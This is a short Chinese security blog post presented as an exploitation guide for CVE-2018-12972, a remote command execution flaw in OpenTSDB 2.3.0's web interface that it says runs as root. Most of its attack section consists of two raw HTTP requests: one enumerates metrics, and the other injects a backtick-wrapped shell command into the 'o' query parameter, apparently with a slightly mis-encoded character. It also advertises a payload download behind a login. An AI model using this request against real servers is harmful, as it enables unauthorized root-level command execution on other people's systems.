OpenTSDB远程命令执行漏洞利用 CVE-2018-12972

  • A+
所属分类:网络安全文章
阿里代金券


推广者专属福利,新客户无门槛领取总价值高达2775元代金券,每种代金券限量500张,先到先得。

OpenTSDB简介

Opentsdb是基于Hbase的分布式的,可伸缩的时间序列数据库。官方提供了一个web界面来提供对查询数据进行可视化分析,其背后的绘图由Gnuplot支持。

Github地址为: https://github.com/OpenTSDB/opentsdb 。

在某些版本(比如2.3.0,以下分析以2.3.0版本为例)中,其提供的Web接口存在远程命令执行漏洞,一旦利用成功将以root权限执行。

漏洞利用方法

先查出可以使用的metrics

  1. GET /suggest?type=metrics&q= HTTP/1.1

发包,在参数位置处填入payload。

  1. GET /q?start=2018/07/05-00:00:00&end=2018/07/30-00:00:00&m=sum:rate:env.air&o=%6ls%60&yrange=%5B0:%5D&wxh=1900x738&style=linespoint&json HTTP/1.1

OpenTSDB远程命令执行漏洞利用 CVE-2018-12972

Payload下载

部分内容被隐藏
需登陆后可查看
CE安全网

发表评论

您必须登录才能发表评论!